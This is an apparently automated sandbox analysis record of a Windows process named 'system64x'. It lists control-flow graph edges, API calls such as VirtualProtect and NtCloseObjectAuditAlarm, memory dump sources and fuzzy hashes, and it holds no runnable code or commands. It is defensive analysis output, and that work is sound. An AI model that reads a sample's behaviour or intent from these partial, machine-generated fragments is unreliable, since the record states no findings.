7ff762441599 4042->4043 4044 7ff762441394 2 API calls 4043->4044 4045 7ff7624415a3 4044->4045 4046 7ff762441394 2 API calls 4045->4046 4047 7ff7624415a8 4046->4047 4048 7ff762441394 2 API calls 4047->4048 4049 7ff7624415b7 4048->4049 4050 7ff762441394 2 API calls 4049->4050 4051 7ff7624415c6 4050->4051 4052 7ff762441394 2 API calls 4051->4052 4053 7ff7624415d5 4052->4053 4054 7ff762441394 2 API calls 4053->4054 4055 7ff7624415e4 4054->4055 4056 7ff762441394 2 API calls 4055->4056 4057 7ff7624415f3 4056->4057 4057->3882 4059 7ff762441394 2 API calls 4058->4059 4060 7ff76244153a 4059->4060 4061 7ff762441394 2 API calls 4060->4061 4062 7ff76244153f 4061->4062 4063 7ff76244154e 4062->4063 4064 7ff762441394 2 API calls 4062->4064 4065 7ff762441394 2 API calls 4063->4065 4064->4063 4066 7ff762441558 4065->4066 4067 7ff76244155d 4066->4067 4068 7ff762441394 2 API calls 4066->4068 4069 7ff762441394 2 API calls 4067->4069 4068->4067 4070 7ff762441567 4069->4070 4071 7ff76244156c 4070->4071 4072 7ff762441394 2 API calls 4070->4072 4073 7ff762441394 2 API calls 4071->4073 4072->4071 4074 7ff762441576 4073->4074 4075 7ff76244157b 4074->4075 4076 7ff762441394 2 API calls 4074->4076 4077 7ff762441394 2 API calls 4075->4077 4076->4075 4078 7ff762441585 4077->4078 4079 7ff76244158a 4078->4079 4080 7ff762441394 2 API calls 4078->4080 4081 7ff762441394 2 API calls 4079->4081 4080->4079 4082 7ff762441599 4081->4082 4083 7ff762441394 2 API calls 4082->4083 4084 7ff7624415a3 4083->4084 4085 7ff762441394 2 API calls 4084->4085 4086 7ff7624415a8 4085->4086 4087 7ff762441394 2 API calls 4086->4087 4088 7ff7624415b7 4087->4088 4089 7ff762441394 2 API calls 4088->4089 4090 7ff7624415c6 4089->4090 4091 7ff762441394 2 API calls 4090->4091 4092 7ff7624415d5 4091->4092 4093 7ff762441394 2 API calls 4092->4093 4094 7ff7624415e4 4093->4094 4095 7ff762441394 2 API calls 4094->4095 4096 7ff7624415f3 4095->4096 4096->3621 4096->3622 4098 7ff762441394 2 API calls 4097->4098 4099 7ff76244144f 
4098->4099 4100 7ff76244145e 4099->4100 4101 7ff762441394 2 API calls 4099->4101 4102 7ff762441394 2 API calls 4100->4102 4101->4100 4103 7ff762441468 4102->4103 4104 7ff76244146d 4103->4104 4105 7ff762441394 2 API calls 4103->4105 4106 7ff762441394 2 API calls 4104->4106 4105->4104 4107 7ff762441477 4106->4107 4108 7ff76244147c 4107->4108 4109 7ff762441394 2 API calls 4107->4109 4110 7ff762441394 2 API calls 4108->4110 4109->4108 4111 7ff762441486 4110->4111 4112 7ff76244148b 4111->4112 4113 7ff762441394 2 API calls 4111->4113 4114 7ff762441394 2 API calls 4112->4114 4113->4112 4115 7ff762441495 4114->4115 4116 7ff762441394 2 API calls 4115->4116 4117 7ff76244149a 4116->4117 4118 7ff762441394 2 API calls 4117->4118 4119 7ff7624414a9 4118->4119 4120 7ff762441394 2 API calls 4119->4120 4121 7ff7624414b8 4120->4121 4122 7ff762441394 2 API calls 4121->4122 4123 7ff7624414c7 4122->4123 4124 7ff762441394 2 API calls 4123->4124 4125 7ff7624414d6 4124->4125 4126 7ff762441394 2 API calls 4125->4126 4127 7ff7624414e5 4126->4127 4128 7ff762441394 2 API calls 4127->4128 4129 7ff7624414f4 4128->4129 4130 7ff762441394 2 API calls 4129->4130 4131 7ff762441503 4130->4131 4132 7ff762441394 2 API calls 4131->4132 4133 7ff762441512 4132->4133 4134 7ff762441394 2 API calls 4133->4134 4135 7ff762441521 4134->4135 4136 7ff762441530 4135->4136 4137 7ff762441394 2 API calls 4135->4137 4138 7ff762441394 2 API calls 4136->4138 4137->4136 4139 7ff76244153a 4138->4139 4140 7ff762441394 2 API calls 4139->4140 4141 7ff76244153f 4140->4141 4142 7ff76244154e 4141->4142 4143 7ff762441394 2 API calls 4141->4143 4144 7ff762441394 2 API calls 4142->4144 4143->4142 4145 7ff762441558 4144->4145 4146 7ff76244155d 4145->4146 4147 7ff762441394 2 API calls 4145->4147 4148 7ff762441394 2 API calls 4146->4148 4147->4146 4149 7ff762441567 4148->4149 4150 7ff76244156c 4149->4150 4151 7ff762441394 2 API calls 4149->4151 4152 7ff762441394 2 API calls 4150->4152 4151->4150 4153 7ff762441576 4152->4153 4154 
7ff76244157b 4153->4154 4155 7ff762441394 2 API calls 4153->4155 4156 7ff762441394 2 API calls 4154->4156 4155->4154 4157 7ff762441585 4156->4157 4158 7ff76244158a 4157->4158 4159 7ff762441394 2 API calls 4157->4159 4160 7ff762441394 2 API calls 4158->4160 4159->4158 4161 7ff762441599 4160->4161 4162 7ff762441394 2 API calls 4161->4162 4163 7ff7624415a3 4162->4163 4164 7ff762441394 2 API calls 4163->4164 4165 7ff7624415a8 4164->4165 4166 7ff762441394 2 API calls 4165->4166 4167 7ff7624415b7 4166->4167 4168 7ff762441394 2 API calls 4167->4168 4169 7ff7624415c6 4168->4169 4170 7ff762441394 2 API calls 4169->4170 4171 7ff7624415d5 4170->4171 4172 7ff762441394 2 API calls 4171->4172 4173 7ff7624415e4 4172->4173 4174 7ff762441394 2 API calls 4173->4174 4175 7ff7624415f3 4174->4175 4175->3626 4175->3630 4177 7ff762441394 2 API calls 4176->4177 4178 7ff76244142c 4177->4178 4179 7ff762441431 4178->4179 4180 7ff762441394 2 API calls 4178->4180 4181 7ff762441394 2 API calls 4179->4181 4180->4179 4182 7ff76244143b 4181->4182 4183 7ff762441440 4182->4183 4184 7ff762441394 2 API calls 4182->4184 4185 7ff762441394 2 API calls 4183->4185 4184->4183 4186 7ff76244144f 4185->4186 4187 7ff76244145e 4186->4187 4188 7ff762441394 2 API calls 4186->4188 4189 7ff762441394 2 API calls 4187->4189 4188->4187 4190 7ff762441468 4189->4190 4191 7ff76244146d 4190->4191 4192 7ff762441394 2 API calls 4190->4192 4193 7ff762441394 2 API calls 4191->4193 4192->4191 4194 7ff762441477 4193->4194 4195 7ff76244147c 4194->4195 4196 7ff762441394 2 API calls 4194->4196 4197 7ff762441394 2 API calls 4195->4197 4196->4195 4198 7ff762441486 4197->4198 4199 7ff76244148b 4198->4199 4200 7ff762441394 2 API calls 4198->4200 4201 7ff762441394 2 API calls 4199->4201 4200->4199 4202 7ff762441495 4201->4202 4203 7ff762441394 2 API calls 4202->4203 4204 7ff76244149a 4203->4204 4205 7ff762441394 2 API calls 4204->4205 4206 7ff7624414a9 4205->4206 4207 7ff762441394 2 API calls 4206->4207 4208 7ff7624414b8 4207->4208 4209 
7ff762441394 2 API calls 4208->4209 4210 7ff7624414c7 4209->4210 4211 7ff762441394 2 API calls 4210->4211 4212 7ff7624414d6 4211->4212 4213 7ff762441394 2 API calls 4212->4213 4214 7ff7624414e5 4213->4214 4215 7ff762441394 2 API calls 4214->4215 4216 7ff7624414f4 4215->4216 4217 7ff762441394 2 API calls 4216->4217 4218 7ff762441503 4217->4218 4219 7ff762441394 2 API calls 4218->4219 4220 7ff762441512 4219->4220 4221 7ff762441394 2 API calls 4220->4221 4222 7ff762441521 4221->4222 4223 7ff762441530 4222->4223 4224 7ff762441394 2 API calls 4222->4224 4225 7ff762441394 2 API calls 4223->4225 4224->4223 4226 7ff76244153a 4225->4226 4227 7ff762441394 2 API calls 4226->4227 4228 7ff76244153f 4227->4228 4229 7ff76244154e 4228->4229 4230 7ff762441394 2 API calls 4228->4230 4231 7ff762441394 2 API calls 4229->4231 4230->4229 4232 7ff762441558 4231->4232 4233 7ff76244155d 4232->4233 4234 7ff762441394 2 API calls 4232->4234 4235 7ff762441394 2 API calls 4233->4235 4234->4233 4236 7ff762441567 4235->4236 4237 7ff76244156c 4236->4237 4238 7ff762441394 2 API calls 4236->4238 4239 7ff762441394 2 API calls 4237->4239 4238->4237 4240 7ff762441576 4239->4240 4241 7ff76244157b 4240->4241 4242 7ff762441394 2 API calls 4240->4242 4243 7ff762441394 2 API calls 4241->4243 4242->4241 4244 7ff762441585 4243->4244 4245 7ff76244158a 4244->4245 4246 7ff762441394 2 API calls 4244->4246 4247 7ff762441394 2 API calls 4245->4247 4246->4245 4248 7ff762441599 4247->4248 4249 7ff762441394 2 API calls 4248->4249 4250 7ff7624415a3 4249->4250 4251 7ff762441394 2 API calls 4250->4251 4252 7ff7624415a8 4251->4252 4253 7ff762441394 2 API calls 4252->4253 4254 7ff7624415b7 4253->4254 4255 7ff762441394 2 API calls 4254->4255 4256 7ff7624415c6 4255->4256 4257 7ff762441394 2 API calls 4256->4257 4258 7ff7624415d5 4257->4258 4259 7ff762441394 2 API calls 4258->4259 4260 7ff7624415e4 4259->4260 4261 7ff762441394 2 API calls 4260->4261 4262 7ff7624415f3 4261->4262 4262->3700 4264 7ff762441394 2 API calls 
Control-flow graph (edge-list residue of the graph image; only node addresses and API names survive): long chains of basic blocks between 7ff76244141d and 7ff7624415f3, each making a call into the function at 7ff762441394 (2 API calls); further nodes 7ff762441000 -> 7ff76244108b (__set_app_type), 7ff762441e00 -> 7ff762448d40 (__setusermatherr), 7ff762441800 -> 7ff762441835 (fprintf), 7ff762442320 (strlen), 7ff762441e65 -> 7ff762441e67 (signal), 7ff762442104 -> 7ff762442111 (EnterCriticalSection, TlsGetValue, GetLastError, LeaveCriticalSection, free, DeleteCriticalSection) and 7ff762441ac3 -> 7ff762441a70 -> 7ff7624419e9 (VirtualProtect) with 7ff762441ba0 (4 API calls).

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
• Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
Similarity
• API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
• String ID:
• API String ID: 2643109117-0
• Opcode ID: c996e7a35bf803568ca43188fa743fd5e2d0011960c1ad381c257ca82b16660a
• Instruction ID: aec390b347d325cfd779a5552e7f76f4da732c4c6f2b63f6d36a239ad3089e28
• Opcode Fuzzy Hash: c996e7a35bf803568ca43188fa743fd5e2d0011960c1ad381c257ca82b16660a
• Instruction Fuzzy Hash: DF514C31A19646C5FE91BB15E950379ABA2FF48780FC48031C90D977A2DFACBC59C760

Control-flow Graph

APIs
• NtCloseObjectAuditAlarm.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF762441156), ref: 00007FF7624413F7
Memory Dump Source
• Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
• Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
Similarity
• API ID: AlarmAuditCloseObject
• String ID:
• API String ID: 2871759311-0
• Opcode ID: 780e7118a6cfb6d36c84ad4db31f8807fd0b8417d9b6a87ee28a6c59f42cfa84
• Instruction ID: 4c600914615dd10df9b5a087d1ded2f7018fd2782cf10b635c997d03dfdd2b9c
• Opcode Fuzzy Hash: 780e7118a6cfb6d36c84ad4db31f8807fd0b8417d9b6a87ee28a6c59f42cfa84
• Instruction Fuzzy Hash: 62F0C971D09B45C2DA54EB51F85042EBB60FB48385B404435E99C43725DFBCE854CF60

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
• Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
Similarity
• API ID: memset$wcscatwcscpywcslen
• String ID: $0$0$@$@
• API String ID: 4263182637-1413854666
• Opcode ID: 1ebfceb6ccbc61bfdc6d1d73518e072520c38c1920a0aba60a62dff29e637d97
• Instruction ID: 14a2121c81449dda447dfdb37487bd833b50a17993be9acc7c092749a90725ac
• Opcode Fuzzy Hash: 1ebfceb6ccbc61bfdc6d1d73518e072520c38c1920a0aba60a62dff29e637d97
• Instruction Fuzzy Hash: FEB1C32190C6C2C5FBA1AB14E4453FAFBA1FF80744F944235EA8C42AA5DFBDE549CB50

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
• Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
Similarity
• API ID: wcslen$memsetwcscatwcscpywcsncmp
• String ID: 0$X$`
• API String ID: 329590056-2527496196
• Opcode ID: 8dd9b4d9794abecbbce3b974b874b08a77c89a1688d8793b7a9d9c155a3acde6
• Instruction ID: e7442feb45efff10903a91c90b4f7da95675dfa82c5c679b813789651da8d5ed
• Opcode Fuzzy Hash: 8dd9b4d9794abecbbce3b974b874b08a77c89a1688d8793b7a9d9c155a3acde6
• Instruction Fuzzy Hash: 5A02A522908BC5C1EBA0DB15E8443AABBA1FB85794F844335DA9C43BE5DFBCE548C750

Control-flow Graph

APIs
• VirtualQuery.KERNEL32(?,?,?,?,00007FF76244A694,00007FF76244A694,?,?,00007FF762440000,?,00007FF762441991), ref: 00007FF762441C63
• VirtualProtect.KERNEL32(?,?,?,?,00007FF76244A694,00007FF76244A694,?,?,00007FF762440000,?,00007FF762441991), ref: 00007FF762441CC7
• memcpy.MSVCRT ref: 00007FF762441CE0
• GetLastError.KERNEL32(?,?,?,?,00007FF76244A694,00007FF76244A694,?,?,00007FF762440000,?,00007FF762441991), ref: 00007FF762441D23
Strings
Memory Dump Source
• Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
• Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
Similarity
• API ID: Virtual$ErrorLastProtectQuerymemcpy
• String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
• API String ID: 2595394609-2123141913
• Opcode ID: 8a554a6fa389011197ec1d316fb9bfbcb4cc07135e3b9ec9b47a0c356bf0b17d
• Instruction ID: e186b1fab2b2673d6d16ae1e8d2d2d3b4b3ac9d79055f46793f926b25d8599ab
• Opcode Fuzzy Hash: 8a554a6fa389011197ec1d316fb9bfbcb4cc07135e3b9ec9b47a0c356bf0b17d
• Instruction Fuzzy Hash: 2441A4B1A08A42C1FE90EB45D8946B8AB61EF84BC4F954132CE0D477A1DFBCE959D320

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
• Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
Similarity
• API ID: memsetwcscatwcscpywcslen
• String ID: $0$@
• API String ID: 468205783-2347541974
• Opcode ID: 659bee40769b99f3727e1d647f561d414f9a26e08f9d5cb18db75b3f823b1ed2
• Instruction ID: 3d86307f4ad32fa140ff18cf0e92d883eb8a9c8b7f025a3c9baac62d85ba0320
• Opcode Fuzzy Hash: 659bee40769b99f3727e1d647f561d414f9a26e08f9d5cb18db75b3f823b1ed2
• Instruction Fuzzy Hash: 8661702191C6C1C5FB61AB14E4853ABFBA1EBD4394F940231EA8C43AA5EFBDD549CB10

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                          • String ID:
                                                                          • API String ID: 3326252324-0
                                                                          • Opcode ID: b536a55527d214355ccdc22c4662103ecafd3a57f3d1ce3f70d4549eef9b577b
                                                                          • Instruction ID: 2028ca60fd8483e9f58fa18b87d19097d0f6fda7e708795c45529ad8b2f4e9ad
                                                                          • Opcode Fuzzy Hash: b536a55527d214355ccdc22c4662103ecafd3a57f3d1ce3f70d4549eef9b577b
                                                                          • Instruction Fuzzy Hash: B121E420A19912C1FE95EB01A990335A662FF44B91F880131CA0D9BAA4DFACFC49C360

                                                                          Control-flow Graph

                                                                          control_flow_graph 671 7ff762441e10-7ff762441e2d 672 7ff762441e3e-7ff762441e48 671->672 673 7ff762441e2f-7ff762441e38 671->673 675 7ff762441e4a-7ff762441e53 672->675 676 7ff762441ea3-7ff762441ea8 672->676 673->672 674 7ff762441f60-7ff762441f69 673->674 677 7ff762441ecc-7ff762441ed1 675->677 678 7ff762441e55-7ff762441e60 675->678 676->674 679 7ff762441eae-7ff762441eb3 676->679 680 7ff762441f23-7ff762441f2d 677->680 681 7ff762441ed3-7ff762441ee2 signal 677->681 678->676 682 7ff762441efb-7ff762441f0a call 7ff762448d50 679->682 683 7ff762441eb5-7ff762441eba 679->683 684 7ff762441f2f-7ff762441f3f 680->684 685 7ff762441f43-7ff762441f45 680->685 681->680 686 7ff762441ee4-7ff762441ee8 681->686 682->680 693 7ff762441f0c-7ff762441f10 682->693 683->674 688 7ff762441ec0 683->688 692 7ff762441f5a 684->692 685->674 689 7ff762441eea-7ff762441ef9 signal 686->689 690 7ff762441f4e-7ff762441f53 686->690 688->680 689->674 690->692 692->674 694 7ff762441f12-7ff762441f21 signal 693->694 695 7ff762441f55 693->695 694->674 694->680 695->692
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG
                                                                          • API String ID: 0-1584390748
                                                                          • Opcode ID: 81cc92ec2fa6e04c40e525b18e1cc1ff4a5f4b230223796d890c278b07bd10c2
                                                                          • Instruction ID: ef36efc3888ed83aa0e695d9297eec9b5409c828ccf551cf238b814a733b1be1
                                                                          • Opcode Fuzzy Hash: 81cc92ec2fa6e04c40e525b18e1cc1ff4a5f4b230223796d890c278b07bd10c2
                                                                          • Instruction Fuzzy Hash: 3C21B021F0D106C1FEF476149A803799981DF887A4FA48631DE0E433D4DEECAC9BC261

                                                                          Control-flow Graph

                                                                          control_flow_graph 696 7ff762441880-7ff76244189c 697 7ff7624418a2-7ff7624418f9 call 7ff762442420 call 7ff762442660 696->697 698 7ff762441a0f-7ff762441a1f 696->698 697->698 703 7ff7624418ff-7ff762441910 697->703 704 7ff76244193e-7ff762441941 703->704 705 7ff762441912-7ff76244191c 703->705 707 7ff76244194d-7ff762441954 704->707 708 7ff762441943-7ff762441947 704->708 706 7ff76244191e-7ff762441929 705->706 705->707 706->707 709 7ff76244192b-7ff76244193a 706->709 711 7ff76244199e-7ff7624419a6 707->711 712 7ff762441956-7ff762441961 707->712 708->707 710 7ff762441a20-7ff762441a26 708->710 709->704 713 7ff762441b87-7ff762441b98 call 7ff762441d40 710->713 714 7ff762441a2c-7ff762441a37 710->714 711->698 715 7ff7624419a8-7ff7624419c1 711->715 716 7ff762441970-7ff76244199c call 7ff762441ba0 712->716 714->711 718 7ff762441a3d-7ff762441a5f 714->718 719 7ff7624419df-7ff7624419e7 715->719 716->711 723 7ff762441a7d-7ff762441a97 718->723 724 7ff7624419e9-7ff762441a0d VirtualProtect 719->724 725 7ff7624419d0-7ff7624419dd 719->725 726 7ff762441a9d-7ff762441afa 723->726 727 7ff762441b74-7ff762441b82 call 7ff762441d40 723->727 724->725 725->698 725->719 733 7ff762441afc-7ff762441b0e 726->733 734 7ff762441b22-7ff762441b26 726->734 727->713 735 7ff762441b5c-7ff762441b6c 733->735 736 7ff762441b10-7ff762441b20 733->736 737 7ff762441b2c-7ff762441b30 734->737 738 7ff762441a70-7ff762441a77 734->738 735->727 739 7ff762441b6f call 7ff762441d40 735->739 736->734 736->735 737->738 740 7ff762441b36-7ff762441b57 call 7ff762441ba0 737->740 738->711 738->723 739->727 740->735
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF762441247), ref: 00007FF7624419F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: f55d23e6802c9323605da89ae8314c5a5c300cb13031396fec444b8fb4cb03df
                                                                          • Instruction ID: b0d08b4ade2a55959220eb5db7916ea43317a779207f0e41d7460a512851f2c7
                                                                          • Opcode Fuzzy Hash: f55d23e6802c9323605da89ae8314c5a5c300cb13031396fec444b8fb4cb03df
                                                                          • Instruction Fuzzy Hash: 2D518031F08546D6EF90EB25D9407B4AB62FB08B98F848131D92C07795CFBDE899D720

                                                                          Control-flow Graph

                                                                          control_flow_graph 744 7ff762441800-7ff762441810 745 7ff762441812-7ff762441822 744->745 746 7ff762441824 744->746 747 7ff76244182b-7ff762441867 call 7ff762442290 fprintf 745->747 746->747
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 6dc62383441ec21015d1a93eb8b73b3a2626f1b89f937b38c1cf0d1080ec3dd9
                                                                          • Instruction ID: cb85885ab14fced4eb582f61079e4c4b77de9d321d6bfeb7acf2f0b49ff02e89
                                                                          • Opcode Fuzzy Hash: 6dc62383441ec21015d1a93eb8b73b3a2626f1b89f937b38c1cf0d1080ec3dd9
                                                                          • Instruction Fuzzy Hash: 10F0C221E08A85C2FA91BB24AA410B9E761EB593C1F80D231DE4D97651DF6CE986C310

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
